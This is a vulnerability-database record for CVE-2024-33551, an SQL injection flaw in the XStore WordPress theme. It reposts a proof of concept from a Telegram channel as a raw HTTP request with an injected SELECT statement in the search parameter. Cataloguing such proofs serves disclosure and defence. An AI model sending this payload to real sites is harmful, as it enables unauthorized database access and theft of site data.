{"uuid": "a2e63225-9ac6-4102-b1a8-148141eb8407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/228", "content": "CVE-2024-33551\n\u26d4\nSQL inj vulnerability discovered in 8theme XStore, an e-commerce platform built on WordPress. \nThe vulnerability allows SQL commands in the database.\n\n\nPOC\nPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1", "creation_timestamp": "2024-05-17T14:08:04.000000Z"}